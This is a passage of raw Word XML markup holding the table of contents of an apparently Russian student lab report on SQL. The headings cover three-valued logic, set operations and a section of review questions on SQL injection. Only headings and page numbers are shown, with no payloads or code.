              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005047" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Итоговая матрица доступа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005047 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0720C973" w14:textId="29460C7F" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005048" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Ответы на контрольные вопросы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005048 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FDD063D" w14:textId="3FA4C697" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005049" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Какие операции реляционной алгебры не поддерживаются в SQL напрямую?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005049 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D451440" w14:textId="2C93FC54" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005050" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>В чем особенности NULL значения в SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E2696AB" w14:textId="1F05DE14" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005051" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Как трехзначная логика влияет на операции агрегирования?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="396EF989" w14:textId="128B2045" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005052" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Как трехзначная логика влияет на операции сравнения?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005052 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7167C752" w14:textId="7D709C44" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005053" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Как трехзначная логика влияет на операции с множествами?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005053 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35568ABA" w14:textId="53E825B4" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005054" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Какой порядок приоритета имеют операции UNION, INTERSECT, EXCEPT?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005054 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5414D7D0" w14:textId="2D0D1E29" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005055" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>По каким признакам можно разделить инъекции в языки запросов?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005055 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EA82306" w14:textId="357C8209" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005056" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Какие техники может использовать злоумышленник для обхода фильтрации по ключевым словам?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005056 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53547C90" w14:textId="329BD03D" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005057" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>В какие типы параметров может быть проведена SQLi?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005057 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B3B82EA" w14:textId="14E80A5D" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005058" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>В каких случаях вообще возможна эксплуатация техники SQLi?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="651A4CB5" w14:textId="39DC9390" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005059" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Как различия синтаксиса различных СУБД влияют на технику SQLi? Почему различия синтаксиса возможны для злоумышленника?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CFDA5C7" w14:textId="4C8D91E2" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005060" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Зачем злоумышленниками применяются инъекции типа error-based?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69CD9DF4" w14:textId="5837101E" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="24"/>
